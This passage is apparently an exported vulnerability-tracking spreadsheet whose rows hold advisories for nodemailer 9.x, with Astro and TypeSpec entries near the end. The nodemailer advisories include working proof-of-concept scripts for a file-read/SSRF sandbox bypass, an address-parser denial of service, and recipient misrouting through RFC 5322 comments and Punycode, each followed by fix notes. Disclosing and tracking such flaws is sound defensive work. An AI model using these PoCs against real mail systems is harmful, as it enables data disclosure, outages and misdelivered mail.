    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="T1652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92595</t></is></c></row><row r="1653"><c r="A1653" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1653" s="5" t="inlineStr"><is><t>CVE-2026-92596</t></is></c><c r="D1653" s="5" t="inlineStr" /><c r="E1653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1653" s="5" t="inlineStr" /><c r="H1653" s="5" t="inlineStr" /><c r="I1653" s="5" t="inlineStr" /><c r="J1653" s="5" t="inlineStr" /><c r="K1653" s="5" t="inlineStr" /><c r="L1653" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1653" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1653" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1653" s="5" t="inlineStr" /><c r="R1653" s="5" t="inlineStr" /><c r="S1653" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's address parser (`lib/addressparser/index.js`) parses a list of comma‑separated addresses in **quadratic time — O(n²)** in the number of addresses. A single crafted address string (e.g. a `To`, `Cc`, `Bcc`, `From`, or `Reply‑To` value, or any value passed to the exported `addressparser`) therefore consumes CPU proportional to the **square** of its length and blocks Node's single‑threaded event loop for the entire duration, denying service to every other request in the process.

This requires **no special application configuration and no cooperating receiver** — it is entirely inside the parser and triggers on the library's default code path. A ~1.5 MB address value freezes the process for ~25–30 seconds of 100% CPU; the cost grows with the square of the input, so a few‑MB value stalls the server for minutes. It is a distinct issue from the recursion DoS fixed as CVE‑2025‑14874 (that path is guarded by a nesting‑depth cap; this one is a flat, comma‑separated list with no such limit).

### Details

`addressparser` tokenizes the input, splits it into per‑address token groups, and then accumulates the parsed results in a loop (`lib/addressparser/index.js`, ~lines 500–505):

```js
addresses.forEach(addr =&gt; {
    const handled = _handleAddress(addr, depth);
    if (handled.length) {
        parsedAddresses = parsedAddresses.concat(handled);   // &lt;-- line ~503
    }
});
```

`Array.prototype.concat` builds and returns a **new** array containing a copy of every element accumulated so far. Reassigning `parsedAddresses = parsedAddresses.concat(handled)` on each of the *n* iterations copies 1 + 2 + 3 + … + n elements in total, i.e. **O(n²)** work (and O(n²) transient allocations) for an input containing *n* addresses. Tokenization and `_handleAddress` themselves are linear; the quadratic blowup is entirely this accumulator.

**Root‑cause proof.** Replacing only that line with an in‑place append and re‑running the exact same input:

```
parsedAddresses = parsedAddresses.concat(handled);      -&gt;  100000 addresses:  ~6068 ms
parsedAddresses.push.apply(parsedAddresses, handled);   -&gt;  100000 addresses:  ~51 ms   (≈119x faster, now linear)
```

**Measured scaling** (nodemailer 9.0.6, `'a@b.com,'.repeat(n)`):

| addresses n | input size | parse time | ratio for 2× input |
|---|---|---|---|
| 25,000  | 0.19 MB | ~0.35 s | – |
| 50,000  | 0.38 MB | ~1.4 s  | ×4.0 |
| 100,000 | 0.76 MB | ~6–8 s  | ×3.9 |
| 200,000 | 1.53 MB | ~25–30 s| ×4.1 |

Doubling the input quadruples the time — the signature of O(n²).

**Reachability.** The parser is invoked on any structured‑address header value on the normal send path (`MimeNode.setHeader('To'/'Cc'/'Bcc'/'From'/'Reply-To', value)` → `_parseAddresses` → `addressparser`, and `getEnvelope()`), so a single `transport.sendMail({ to: &lt;crafted string&gt; })` triggers it. It is also reached directly through the **exported** `require('nodemailer/lib/addressparser')`, which many applications call to validate or display user‑supplied recipient lists. Confirmed via the public API: `setHeader('To', 'a@b.com,'.repeat(80000))` + `getEnvelope()` blocks for ~3.9 s.

**Suggested fix:** accumulate in place instead of rebuilding the array each iteration, e.g. `parsedAddresses.push.apply(parsedAddresses, handled);` (or `for (const h of handled) parsedAddresses.push(h);`). Optionally cap the number of addresses / input length before parsing.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No transport, network, or configuration required — the cost is in parsing.

`poc-dos.js`:
```js
'use strict';
const addressparser = require('nodemailer/lib/addressparser');

console.log('addresses | input size | parse time');
for (const n of [25000, 50000, 100000, 200000]) {
  const payload = 'a@b.com,'.repeat(n);        // n valid, comma-separated recipients
  const t0 = process.hrtime.bigint();
  addressparser(payload);                       // blocks synchronously
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(String(n).padStart(9) + ' | ' + (payload.length / 1048576).toFixed(2) + ' MB   | ' + ms.toFixed(0).padStart(7) + ' ms');
}
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-dos.js
```

Actual output (nodemailer 9.0.6):
```
addresses | input size | parse time
    25000 | 0.19 MB   |     381 ms
    50000 | 0.38 MB   |    1435 ms
   100000 | 0.76 MB   |    7949 ms
   200000 | 1.53 MB   |   25154 ms
```

Equivalent trigger through the normal send API (freezes the event loop):
```js
const nodemailer = require('nodemailer');
nodemailer.createTransport({ jsonTransport: true })
  .sendMail({ from: 'a@b.com', to: 'a@b.com,'.repeat(150000), subject: 'x', text: 'y' });
// ~15+ seconds of 100% CPU inside addressparser before anything is sent
```

### Impact

* **Who is impacted:** any service that runs Nodemailer (or the standalone `nodemailer/lib/addressparser`) on an address value that can be influenced by an untrusted party — a recipient field in a "send email / invite / share" feature, a `Reply‑To`/`From` derived from user input, a contact‑import or mailing‑list parser, or any endpoint that validates addresses with `addressparser`. No authentication, special option, or particular receiver is needed.

## Patched in 9.1.0

Three separate quadratic paths were fixed, not one:

* `addressparser` rebuilt its accumulator with `concat()` on every address ([9116da9](https://github.com/nodemailer/nodemailer/commit/9116da9)).
* The display-name merge loop directly below spliced each fragment out of the array, the same shape reached through `'a, b &lt;c@d.com&gt;,'.repeat(n)` (same commit).
* `MimeNode#_convertAddresses` checked recipient uniqueness with a linear scan per address ([7cc38af](https://github.com/nodemailer/nodemailer/commit/7cc38af), refined in [34da642](https://github.com/nodemailer/nodemailer/commit/34da642)). This was the most severe of the three and the reported proof of concept did not reach it: `'a@b.com,'.repeat(n)` is one address repeated, which dedupes to a single envelope entry. A list of *distinct* recipients cost O(n^2) here, taking ~35s for 100k even after `addressparser` was fixed.

Fixed alongside: `[].concat.apply` in `_parseAddresses` threw `RangeError: Maximum call stack size exceeded` past roughly 124k recipients, with no crafted input needed ([83b8c48](https://github.com/nodemailer/nodemailer/commit/83b8c48)).

Parsing 200k addresses now takes ~80ms instead of ~25s, and every path scales linearly. A new `maxRecipients` option (default 100000) throws rather than truncating, as a backstop.</t></is></c><c r="T1653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92596</t></is></c></row><row r="1654"><c r="A1654" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1654" s="5" t="inlineStr"><is><t>CVE-2026-92597</t></is></c><c r="D1654" s="5" t="inlineStr" /><c r="E1654" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1654" s="5" t="inlineStr" /><c r="H1654" s="5" t="inlineStr" /><c r="I1654" s="5" t="inlineStr" /><c r="J1654" s="5" t="inlineStr" /><c r="K1654" s="5" t="inlineStr" /><c r="L1654" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1654" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1654" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1654" s="5" t="inlineStr" /><c r="R1654" s="5" t="inlineStr" /><c r="S1654" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

// tiny SMTP sink that prints the literal RCPT TO nodemailer transmits
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="T1654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92597</t></is></c></row><row r="1655"><c r="A1655" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1655" s="5" t="inlineStr"><is><t>CVE-2026-92598</t></is></c><c r="D1655" s="5" t="inlineStr" /><c r="E1655" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1655" s="5" t="inlineStr" /><c r="H1655" s="5" t="inlineStr" /><c r="I1655" s="5" t="inlineStr" /><c r="J1655" s="5" t="inlineStr" /><c r="K1655" s="5" t="inlineStr" /><c r="L1655" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1655" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1655" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1655" s="5" t="inlineStr" /><c r="R1655" s="5" t="inlineStr" /><c r="S1655" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A tiny SMTP sink that prints the literal RCPT TO Nodemailer transmits:
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits             :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="T1655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92598</t></is></c></row><row r="1656"><c r="A1656" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1656" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D1656" s="5" t="inlineStr" /><c r="E1656" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1656" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1656" s="5" t="inlineStr" /><c r="H1656" s="5" t="inlineStr" /><c r="I1656" s="5" t="inlineStr" /><c r="J1656" s="5" t="inlineStr" /><c r="K1656" s="5" t="inlineStr" /><c r="L1656" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1656" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N1656" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1656" s="5" t="inlineStr" /><c r="R1656" s="5" t="inlineStr" /><c r="S1656" s="5" t="inlineStr"><is><t>A vulnerability in `libheif`, used by the default Sharp image service in Astro, can lead to remote code execution when a malicious AVIF image is optimized.

Projects are affected when an attacker can cause Astro to process an untrusted AVIF image.

The fix was released in Astro 7.2.8, which requires Sharp 0.35.4.</t></is></c><c r="T1656" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="1657"><c r="A1657" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1657" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D1657" s="5" t="inlineStr" /><c r="E1657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1657" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1657" s="5" t="inlineStr" /><c r="H1657" s="5" t="inlineStr" /><c r="I1657" s="5" t="inlineStr" /><c r="J1657" s="5" t="inlineStr" /><c r="K1657" s="5" t="inlineStr" /><c r="L1657" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M1657" s="5" t="inlineStr" /><c r="N1657" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1657" s="5" t="inlineStr" /><c r="R1657" s="5" t="inlineStr" /><c r="S1657" s="5" t="inlineStr"><is><t>### Summary

The `@typespec/openapi3` emitter retains the value of a `@versioned` enum member and interpolates it into the output filename as `{version}` without sanitizing path separators or traversal components. The completed path reaches the compiler's `emitFile()`, which creates the parent directory and writes the file without verifying containment under `emitterOutputDir`.

A crafted declarative `.tsp` input can therefore create or overwrite an OpenAPI-formatted `.yaml` or `.json` file outside the configured output tree, subject to the compiler process's filesystem permissions. No executable TypeSpec extension or attacker-controlled JavaScript is required.

### Affected version

Confirmed on:

- `@typespec/compiler` `1.15.0`
- `@typespec/openapi3` `1.15.0`
- `@typespec/http` `1.15.0`
- `@typespec/versioning` `0.85.0`
- release tag commit `f30cd352f93997e04c75d48c7ace6947a1d5d07a`

The critical `openapi.ts` and `emitter-utils.ts` blobs are unchanged on main commit `365ec52b50b82cd9e1e037de4c6fcd5de7e32e90` as checked on 2026-08-19. No patched version was identified.

### Root cause

The value originates at `packages/openapi3/src/openapi.ts:592-608`:

```ts
serviceRecord.versions.push({
  service,
  version: snapshot.version!.value,
  document: document[0],
  diagnostics: document[1],
});
```

It is interpolated without path validation at `openapi.ts:629-641`:

```ts
return interpolatePath(options.outputFile, {
  "openapi-version": specVersion,
  "service-name-if-multiple": multipleService ? getNamespaceFullName(service.type) : undefined,
  "service-name": getNamespaceFullName(service.type),
  "file-type": fileType,
  version,
});
```

The path reaches `emitFile()` at `openapi.ts:392-401`. The sink at `packages/compiler/src/core/emitter-utils.ts:29-39` performs no output-root containment check:

```ts
const outputFolder = getDirectoryPath(options.path);
await program.host.mkdirp(outputFolder);
return await program.host.writeFile(options.path, content);
```

